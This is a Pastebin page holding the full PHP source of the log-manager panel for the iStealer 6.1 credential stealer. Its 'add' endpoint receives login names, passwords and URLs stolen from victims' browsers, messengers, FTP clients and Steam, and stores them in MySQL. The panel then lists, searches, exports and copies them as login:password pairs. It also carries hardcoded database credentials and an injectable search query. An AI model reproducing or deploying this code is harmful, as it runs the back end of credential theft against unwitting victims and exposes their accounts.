API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 16th, 2017
70
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.48 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // CONFIGURATION ******************************************************************************
  3.  
  4. $dbHost = "mysql1.050webhost.com"; // MySQL host
  5. $dbUser = "a4249412_admin"; // MySQL username
  6. $dbPass = "admin1"; // MySQL password
  7. $dbDatabase = "a4249412_admin"; // MySQL database name
  8.  
  9. $username = "admin"; // Login Username
  10. $password = "admin"; // Login Password
  11.  
  12. $logspage = 50; // Number of logs per page
  13.  
  14. // ********************************************************************************************
  15.  
  16. $html = "<html><head><title>iStealer 6.1 Legends Log manager - ";
  17. $header = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
  18. <div id='web'><div id='header'><b>Hello, ".$username."</b></div><div id='navigation'><ul>
  19. <li><a href='?action=logs'>Show All Logs</a></li><li><a href='?action=search'>Search</a></li>
  20. <li><a href='?action=exportall'>Export All Logs</a></li>
  21. <li><a href='?action=logout'>Logout</a></li></ul></div><br>";
  22. $footer = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div></div></body></html>";
  23. $searchform = "<form name='search' method='POST' action='?action=search'>
  24. Search for: <input type='text' name='q' size='20'> In: <select name='in'>
  25. <option selected='selected' value='1'>Url</option><option value='2'>Login</option>
  26. <option value='3'>Password</option><option value='4'>Computer</option>
  27. <option value='5'>Date</option><option value='6'>Ip</option></select>
  28. <input type='submit' value='Search' name='search'></form>";
  29. $loginform = "<form id='loginform' name='frm' method='POST' action='?action=login'>
  30. <table id='logintable' cellpadding='0' cellspacing='10' border='0'>
  31. <tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
  32. <tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
  33. <tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
  34. $javascript = "<script language='javascript' type='text/javascript'>
  35. function checkAll() { chk = document.getElementsByName('sel[]');
  36. for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_all'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  37. function checkform() { chk = document.getElementsByName('sel[]'); for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) {
  38. return true;}} alert('At least one option must be select.'); return false; }
  39. function confirmation() { return confirm('Are you sure you want to delete all selected logs?');}</script>";
  40. $aplications = array("MSN Messenger", "Google talk", "Trillian/MSN", "Trillian/AIM", "Trillian/Yahoo", "Pidgin/Gaim", "Paltalk Scene", "Steam",
  41. "No-Ip" , "DynDNS", "Firefox", "Internet Explorer", "Google Chrome", "Opera", "IDM", "FileZilla", "FlashFXP", "SmartFtp", "CuteFtp");
  42. $cols = array("program", "url", "login", "pass", "computer", "date", "ip");
  43.  
  44. // FUNCTIONS ******************************************************************************
  45. function connect_database() {
  46. global $dbHost, $dbUser, $dbPass, $dbDatabase, $html, $header, $footer;
  47. $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  48. if (!$mysql) {
  49. $html .= "Database Error".$header."Can not connect to database, please check the configuration.".$footer;
  50. die($html);
  51. }
  52. if (!mysql_select_db($dbDatabase, $mysql)) {
  53. mysql_close($mysql);
  54. $html .= "Database Error".$header."Can not select '".$dbDatabase."' database, please check the configuration.".$footer;
  55. die($html);
  56. }
  57. return $mysql;
  58. }
  59. function pages_number($logstotal, $logspage) {
  60. $pagesnumber = ceil($logstotal/$logspage);
  61. $temp = "Pages: ";
  62. for ($i=0; $i<$pagesnumber; $i++) {
  63. if ($_SESSION["page"] == $i)
  64. $temp .= " <span class='page1'>".$i."</span>";
  65. else
  66. $temp .= " <span class='page0'><a href='?action=logs&page=".$i."'>".$i."</a></span>";
  67. }
  68. $temp .= " Results ".($_SESSION["page"]*$logspage)." - ".(($_SESSION["page"]*$logspage)+$logspage)." of about ".$logstotal;
  69. return $temp;
  70. }
  71. function sort_order() {
  72. if ($_SESSION["order"] == 0) $tmp = "ASC"; else $tmp = "DESC";
  73. return $tmp;
  74. }
  75.  
  76. // TEST *************************************************************************************
  77. if ($_GET["action"] == "test") {
  78. $mysql = connect_database();
  79. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  80. if ($result) {
  81. echo "Ready";
  82. } else {
  83. echo "NoReady";
  84. }
  85. mysql_close($mysql);
  86. exit;
  87. }
  88.  
  89. // ADD ***************************************************************************************
  90. if ($_GET["action"] == "add") {
  91. if (isset($_GET["a"]) && isset($_GET["c"]) && isset($_GET["u"]) && isset($_GET["l"])&& isset($_GET["p"])
  92. && is_numeric($_GET["a"]) && $_GET["a"]>=0 && $_GET["a"]<=18 && strlen($_GET["p"])>3) {
  93. $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  94. if (!$mysql) exit;
  95. if (!mysql_select_db($dbDatabase, $mysql)) exit;
  96. $result = mysql_query("SELECT * FROM `logs` WHERE `program` = '".$_GET["a"]."' AND `url` = '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["u"])), $mysql).
  97. "' AND `login` = '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["l"])), $mysql)."' AND `pass` = '".
  98. mysql_real_escape_string(htmlspecialchars(urldecode($_GET["p"])), $mysql)."';", $mysql);
  99. if (!$result) exit;
  100. if (mysql_num_rows($result) == 0) {
  101. $result = mysql_query("INSERT INTO `logs` (`id`, `program`, `url`, `login`, `pass`, `computer`, `date`, `ip`) VALUES (NULL , '".
  102. $_GET["a"]."', '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["u"])), $mysql)."', '".
  103. mysql_real_escape_string(htmlspecialchars(urldecode($_GET["l"])), $mysql)."', '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["p"])), $mysql)."', '".
  104. mysql_real_escape_string(htmlspecialchars(urldecode($_GET["c"])), $mysql)."', '".date("Y-m-d H:i:s")."', '".$_SERVER['REMOTE_ADDR']."');", $mysql);
  105. }
  106. mysql_close($mysql);
  107. }
  108. exit;
  109. }
  110.  
  111. // LOGIN **************************************************************************************
  112. session_start();
  113. if ($_SESSION["user"]!=$username || $_SESSION["ip"]!=$_SERVER["REMOTE_ADDR"]) {
  114. if ($_GET["action"] == "login") {
  115. if (isset($_POST["username"]) && isset($_POST["password"]) && $username==$_POST["username"] && $password==$_POST["password"]) {
  116. session_start();
  117. $_SESSION["user"] = $username;
  118. $_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
  119. $_SESSION["sort"] = 5;
  120. $_SESSION["order"] = 1;
  121. $_SESSION["page"] = 0;
  122.  
  123. $mysql = connect_database();
  124. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  125. if (!$result) {
  126. $result = mysql_query("CREATE TABLE `logs` (`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `program` INT NOT NULL, `url`
  127. VARCHAR(150) NOT NULL, `login` VARCHAR(50) NOT NULL, `pass` VARCHAR(50) NOT NULL, `computer` VARCHAR(50) NOT NULL, `date`
  128. DATETIME NOT NULL, `ip` VARCHAR(15) NOT NULL);", $mysql);
  129. if (!$result) {
  130. $html .= "Database Error".$header."Can not create table 'logs', please check the configuration and your priviledges.".$footer;
  131. die($html);
  132. }
  133. }
  134. mysql_close($mysql);
  135. header("Location: ?action=logs");
  136. } else {
  137. $html = "<html><head><title>Login Error</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  138. echo $html;
  139. exit;
  140. }
  141. } else {
  142. $html = "<html><head><title>Login</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  143. echo $html;
  144. exit;
  145. }
  146. }
  147.  
  148. // LOGOUT ************************************************************************************
  149. if ($_GET["action"] == "logout") {
  150. unset($_SESSION["user"]);
  151. unset($_SESSION["ip"]);
  152. unset($_SESSION["sort"]);
  153. unset($_SESSION["order"]);
  154. unset($_SESSION["page"]);
  155. session_unset();
  156. header("Location: index.php");
  157.  
  158. // LOGS **************************************************************************************
  159. } elseif ($_GET["action"] == "logs" || !isset($_GET["action"])) {
  160.  
  161. if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=6) {
  162. if ($_SESSION["sort"] == $_GET["sort"])
  163. if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort"] = $_GET["sort"];
  164. }
  165.  
  166. $mysql = connect_database();
  167. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  168. $logstotal = mysql_result($result, 0);
  169. if ($logstotal > 0) {
  170. if (isset($_GET["page"]) && is_numeric($_GET["page"]) && $_GET["page"]>=0 && $_GET["page"]<=ceil($logstotal/$logspage))
  171. $_SESSION["page"] = $_GET["page"];
  172.  
  173. $result = mysql_query("SELECT * FROM `logs` ORDER BY `".$cols[$_SESSION["sort"]]."` ".sort_order()." LIMIT ".($logspage*$_SESSION["page"])." , ".$logspage.";", $mysql);
  174. if (!$result) die(mysql_error());
  175.  
  176. $html .= "Logs".$header.$javascript."
  177. <form name='frm' method='POST' action='?action=selected' onsubmit='return checkform();'>
  178. <table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  179. <td><a href='?action=logs&sort=0'>Program</a></td><td><a href='?action=logs&sort=1'>Url / Host</a></td>
  180. <td><a href='?action=logs&sort=2'>Login</a></td><td><a href='?action=logs&sort=3'>Password</a></td>
  181. <td><a href='?action=logs&sort=4'>Computer</a></td><td><a href='?action=logs&sort=5'>Date</a></td>
  182. <td><a href='?action=logs&sort=6'>Ip</a></td>
  183. <td><input type='checkbox' name='check_all' onClick='checkAll();'></td></tr>";
  184. $i = 0;
  185. while ($row = mysql_fetch_array($result)) {
  186. $html .= "<tr class='";
  187. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  188. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  189. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  190. $html .= "<td>".$row["computer"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  191. $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'></td></tr>";
  192. $i++;
  193. }
  194. $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage)."</div><div id='buttons'><input name='buttonact'
  195. type='submit' value='Copy Selected'> <input name='buttonact' type='submit' value='Export Selected'> <input name='buttonact' type='submit'
  196. value='Delete Selected' onclick='if (!confirmation()) return false;'></div></div></form>".$footer;
  197. } else {
  198. $html .= "Logs".$header."No logs found!".$footer;
  199. }
  200. mysql_close($mysql);
  201. echo $html;
  202.  
  203. // SEARCH ************************************************************************************
  204. } elseif ($_GET["action"] == "search") {
  205. if (isset($_POST["q"]) && isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"]>0 && $_POST["in"]<=6) {
  206. $mysql = connect_database();
  207. $result = mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);
  208. if (!$result) die(mysql_error());
  209.  
  210. if (mysql_num_rows($result) > 0) {
  211. $html .= "Search".$header.$javascript.$searchform."
  212. <form name='frm' method='POST' action='?action=selected' onsubmit='return checkform();'>
  213. <table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  214. <td>Program</td><td>Url / Host</td>
  215. <td>Login</td><td>Password</td>
  216. <td>Computer</td><td>Date</td>
  217. <td>Ip</td>
  218. <td><input type='checkbox' name='check_all' onClick='checkAll();'></td></tr>";
  219. $i = 0;
  220. while ($row = mysql_fetch_array($result)) {
  221. $html .= "<tr class='";
  222. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  223. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  224. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  225. $html .= "<td>".$row["computer"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  226. $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'></td></tr>";
  227. $i++;
  228. }
  229. $html .= "</table><div id='pages'><div id='numbers'>".mysql_num_rows($result)." results for '".$_POST["q"]."'</div><div id='buttons'>
  230. <input name='buttonact' type='submit' value='Copy Selected'> <input name='buttonact' type='submit' value='Export Selected'>
  231. <input name='buttonact' type='submit' value='Delete Selected' onclick='if (!confirmation()) return false;'></div></div></form>".$footer;
  232. } else {
  233. $html .= "Search".$header.$searchform."<br>No results found!".$footer;
  234. }
  235. mysql_close($mysql);
  236. } else {
  237. $html .= "Search".$header.$searchform.$footer;
  238. }
  239. echo $html;
  240.  
  241. // EXPORT ALL ************************************************************************************
  242. } elseif ($_GET["action"] == "exportall") {
  243. header("Content-Type: text/plain");
  244. header("Content-Disposition: Attachment; filename=iStealer_6.0_export.txt");
  245. header("Pragma: no-cache");
  246.  
  247. $mysql = connect_database();
  248. $result = mysql_query("SELECT * FROM `logs`;", $mysql);
  249. if (!$result) die(mysql_error());
  250.  
  251. while ($row = mysql_fetch_array($result)) {
  252. echo "Program:\t".$aplications[$row['program']]."\r\n";
  253. echo "Url/Host:\t".$row['url']."\r\n";
  254. echo "Login:\t\t".$row['login']."\r\n";
  255. echo "Password:\t".$row['pass']."\r\n";
  256. echo "Computer:\t".$row['computer']."\r\n";
  257. echo "Date:\t\t".$row['date']."\r\n";
  258. echo "Ip:\t\t\t".$row['ip']."\r\n";
  259. echo "----------------------------------------------------------\r\n";
  260. }
  261. mysql_close($mysql);
  262.  
  263. // SELECTED **************************************************************************************
  264. } elseif ($_GET["action"] == "selected") {
  265. if (isset($_POST["buttonact"]) && isset($_POST["sel"]) && count($_POST["sel"])!=0) {
  266.  
  267. // DELETE SELECTED ***********************************************************************
  268. if ($_POST["buttonact"] == "Delete Selected") {
  269. $mysql = connect_database();
  270. $query = "DELETE FROM `logs` WHERE";
  271. for ($i=0; $i<count($_POST["sel"]); $i++) {
  272. if (is_numeric($_POST["sel"][$i]))
  273. $query .= " `id` = ".$_POST["sel"][$i]." OR";
  274. }
  275. $query .= ';';
  276. $query = str_replace(' OR;', ';', $query);
  277. $result = mysql_query($query, $mysql);
  278. if (!$result) die(mysql_error());
  279. mysql_close($mysql);
  280. header("Location: ?action=logs");
  281.  
  282. // EXPORT SELECTED ***********************************************************************
  283. } elseif ($_POST["buttonact"] == "Export Selected") {
  284. header("Content-Type: text/plain");
  285. header("Content-Disposition: Attachment; filename=iStealer_6.0_export.txt");
  286. header("Pragma: no-cache");
  287. $mysql = connect_database();
  288. $query = "SELECT * FROM `logs` WHERE";
  289. for ($i=0; $i<count($_POST["sel"]); $i++) {
  290. if (is_numeric($_POST["sel"][$i]))
  291. $query .= " `id` = ".$_POST["sel"][$i]." OR";
  292. }
  293. $query .= ';';
  294. $query = str_replace(' OR;', ';', $query);
  295. $result = mysql_query($query, $mysql);
  296. if (!$result) die(mysql_error());
  297. while ($row = mysql_fetch_array($result)) {
  298. echo "Program:\t".$aplications[$row['program']]."\r\n";
  299. echo "Url/Host:\t".$row['url']."\r\n";
  300. echo "Login:\t\t".$row['login']."\r\n";
  301. echo "Password:\t".$row['pass']."\r\n";
  302. echo "Computer:\t".$row['computer']."\r\n";
  303. echo "Date:\t\t".$row['date']."\r\n";
  304. echo "Ip:\t\t\t".$row['ip']."\r\n";
  305. echo "----------------------------------------------------------\r\n";
  306. }
  307. mysql_close($mysql);
  308.  
  309. // COPY SELECTED *************************************************************************
  310. } elseif ($_POST["buttonact"] == "Copy Selected") {
  311. $mysql = connect_database();
  312. $query = "SELECT `login`, `pass` FROM `logs` WHERE";
  313. for ($i=0; $i<count($_POST["sel"]); $i++) {
  314. if (is_numeric($_POST["sel"][$i]))
  315. $query .= " `id` = ".$_POST["sel"][$i]." OR";
  316. }
  317. $query .= ';';
  318. $query = str_replace(' OR;', ';', $query);
  319. $result = mysql_query($query, $mysql);
  320. if (!$result) die(mysql_error());
  321. $html .= "Copy".$header."<table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr class='row1'><td>";
  322. while ($row = mysql_fetch_array($result))
  323. $html .= $row['login'].":".$row['pass']."<br>";
  324. mysql_close($mysql);
  325. $html .= "</td></tr></table><br>".$footer;
  326. echo $html;
  327. }
  328. }
  329. } else {
  330. $html .= "Unexpected Error".$header."Unexpected Error".$footer;
  331. echo $html;
  332. }
  333. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!